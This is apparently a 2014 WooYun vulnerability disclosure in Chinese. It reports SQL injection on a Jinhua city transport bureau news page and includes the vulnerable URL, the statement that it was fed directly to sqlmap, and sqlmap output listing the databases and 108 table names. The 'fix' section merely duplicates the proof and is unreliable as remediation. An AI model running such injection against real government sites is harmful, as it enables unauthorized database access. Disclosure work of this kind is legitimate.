漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-063418
漏洞标题:金华市交通局存在sql注入
相关厂商:金华市交通局
漏洞作者: hkmm
提交时间:2014-06-05 18:51
修复时间:2014-07-23 19:40
公开时间:2014-07-23 19:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-05: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经确认,细节仅向厂商公开
2014-06-20: 细节向核心白帽子及相关领域专家公开
2014-06-30: 细节向普通白帽子公开
2014-07-10: 细节向实习白帽子公开
2014-07-23: 细节向公众公开
简要描述:
某地便民服务存在注入,请看下面
详细说明:
某地便民服务存在注入,请看下面
漏洞证明:
http://www.jhjt.gov.cn/news/newsinfo.jsp?instance_id=14149&lbid=50
直接丢到sqlmap
[21:30:36] [WARNING] the back-end DBMS is not PostgreSQL
[21:30:36] [INFO] testing Microsoft SQL Server
[21:30:36] [INFO] confirming Microsoft SQL Server
[21:30:37] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] jhjt
[*] jhyg
[*] master
[*] model
[*] msdb
[*] tempdb
Database: jhjt
[108 tables]
+------------------------------+
| MyUploadTable |
| TABLEpope |
| TAB_workflow_instance_back |
| TAB_workflow_instance_back |
| TAB_workflow_instance_person |
| VIEW1 |
| VIEW2 |
| VIEW3 |
| deletepope |
| dtproperties |
| ntkohtmlfile |
| ntkoofficefile |
| ntkopdffile |
| setgroupuser |
| tab_filecard_fight |
| tab_forum_info |
| tab_forum_text |
| tab_forum_type |
| tab_free |
| tab_group |
| tab_img |
| tab_list |
| tab_member_group_pope |
| tab_member_group_pope |
| tab_member_per_pope |
| tab_popeb |
| tab_popeb |
| tab_popet |
| tab_rela_select |
| tab_sch_holiday_info |
| tab_sch_info |
| tab_select |
| tab_system_file_type |
| tab_user_list |
| tab_work_table |
| tab_workflow_attach |
| tab_workflow_group_pope |
| tab_workflow_per_pope |
| tab_workflow_point_personb |
| tab_workflow_point_personb |
| tab_workflow_point_personb |
| tab_workflow_process |
| tab_workflow_table101 |
| tab_workflow_table101 |
| tab_workflow_table106 |
| tab_workflow_table109 |
| tab_workflow_table110 |
| tab_workflow_table111 |
| tab_workflow_table125 |
| tab_workflow_table141 |
| tab_workflow_table142 |
| tab_workflow_table143 |
| tab_workflow_table144 |
| tab_workflow_table145 |
| tab_workflow_table146 |
| tab_workflow_table147 |
| tab_workflow_table148 |
| tab_workflow_table149 |
| tab_workflow_table150 |
| tab_workflow_table151 |
| tab_workflow_table152 |
| tab_workflow_table159 |
| tab_workflow_table160 |
| tab_workflow_table183 |
| tab_workflow_table190 |
| tab_workflow_table192 |
| tab_workflow_table207 |
| tab_workflow_table213 |
| tab_workflow_table215 |
| tab_workflow_table217 |
| tab_workflow_table219 |
| tab_workflow_table220 |
| tab_workflow_table221 |
| tab_workflow_table222 |
| tab_workflow_table223 |
| tab_workflow_table224 |
| tab_workflow_table225 |
| tab_workflow_table226 |
| tab_workflow_table227 |
| tab_workflow_table23 |
| tab_workflow_table24 |
| tab_workflow_table51 |
| tab_workflow_table51 |
| tab_workflow_table52 |
| tab_workflow_table57 |
| tab_workflow_table6 |
| tab_workflow_table70 |
| tab_workflow_table70 |
| tab_workflow_table_field |
| tab_workflow_table_field |
| tab_workflow_zybaseid |
| tab_workflow_zybaseid |
| url |
| v126 |
| v144 |
| v6 |
| v_list |
| v_tablepope |
| view_wf_attach_info |
| view_wf_attach_listinfo |
| view_wf_ins_info |
| view_wf_instance_donepoint |
| view_wf_perins_Listinfo |
| view_wf_person_Listinfo |
| view_wf_person_doneListinfo |
| w_table1 |
| workflow_edit |
| xmpope |
+------------------------------+
这些表真叼,我只能说看到这种设计,只能绕道走
修复方案:
http://www.jhjt.gov.cn/news/newsinfo.jsp?instance_id=14149&lbid=50
直接丢到sqlmap
[21:30:36] [WARNING] the back-end DBMS is not PostgreSQL
[21:30:36] [INFO] testing Microsoft SQL Server
[21:30:36] [INFO] confirming Microsoft SQL Server
[21:30:37] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] jhjt
[*] jhyg
[*] master
[*] model
[*] msdb
[*] tempdb
Database: jhjt
[108 tables]
+------------------------------+
| MyUploadTable |
| TABLEpope |
| TAB_workflow_instance_back |
| TAB_workflow_instance_back |
| TAB_workflow_instance_person |
| VIEW1 |
| VIEW2 |
| VIEW3 |
| deletepope |
| dtproperties |
| ntkohtmlfile |
| ntkoofficefile |
| ntkopdffile |
| setgroupuser |
| tab_filecard_fight |
| tab_forum_info |
| tab_forum_text |
| tab_forum_type |
| tab_free |
| tab_group |
| tab_img |
| tab_list |
| tab_member_group_pope |
| tab_member_group_pope |
| tab_member_per_pope |
| tab_popeb |
| tab_popeb |
| tab_popet |
| tab_rela_select |
| tab_sch_holiday_info |
| tab_sch_info |
| tab_select |
| tab_system_file_type |
| tab_user_list |
| tab_work_table |
| tab_workflow_attach |
| tab_workflow_group_pope |
| tab_workflow_per_pope |
| tab_workflow_point_personb |
| tab_workflow_point_personb |
| tab_workflow_point_personb |
| tab_workflow_process |
| tab_workflow_table101 |
| tab_workflow_table101 |
| tab_workflow_table106 |
| tab_workflow_table109 |
| tab_workflow_table110 |
| tab_workflow_table111 |
| tab_workflow_table125 |
| tab_workflow_table141 |
| tab_workflow_table142 |
| tab_workflow_table143 |
| tab_workflow_table144 |
| tab_workflow_table145 |
| tab_workflow_table146 |
| tab_workflow_table147 |
| tab_workflow_table148 |
| tab_workflow_table149 |
| tab_workflow_table150 |
| tab_workflow_table151 |
| tab_workflow_table152 |
| tab_workflow_table159 |
| tab_workflow_table160 |
| tab_workflow_table183 |
| tab_workflow_table190 |
| tab_workflow_table192 |
| tab_workflow_table207 |
| tab_workflow_table213 |
| tab_workflow_table215 |
| tab_workflow_table217 |
| tab_workflow_table219 |
| tab_workflow_table220 |
| tab_workflow_table221 |
| tab_workflow_table222 |
| tab_workflow_table223 |
| tab_workflow_table224 |
| tab_workflow_table225 |
| tab_workflow_table226 |
| tab_workflow_table227 |
| tab_workflow_table23 |
| tab_workflow_table24 |
| tab_workflow_table51 |
| tab_workflow_table51 |
| tab_workflow_table52 |
| tab_workflow_table57 |
| tab_workflow_table6 |
| tab_workflow_table70 |
| tab_workflow_table70 |
| tab_workflow_table_field |
| tab_workflow_table_field |
| tab_workflow_zybaseid |
| tab_workflow_zybaseid |
| url |
| v126 |
| v144 |
| v6 |
| v_list |
| v_tablepope |
| view_wf_attach_info |
| view_wf_attach_listinfo |
| view_wf_ins_info |
| view_wf_instance_donepoint |
| view_wf_perins_Listinfo |
| view_wf_person_Listinfo |
| view_wf_person_doneListinfo |
| w_table1 |
| workflow_edit |
| xmpope |
+------------------------------+
这些表真叼,我只能说看到这种设计,只能绕道走
版权声明:转载请注明来源 hkmm@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-06-10 16:11
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心处置。
最新状态:
暂无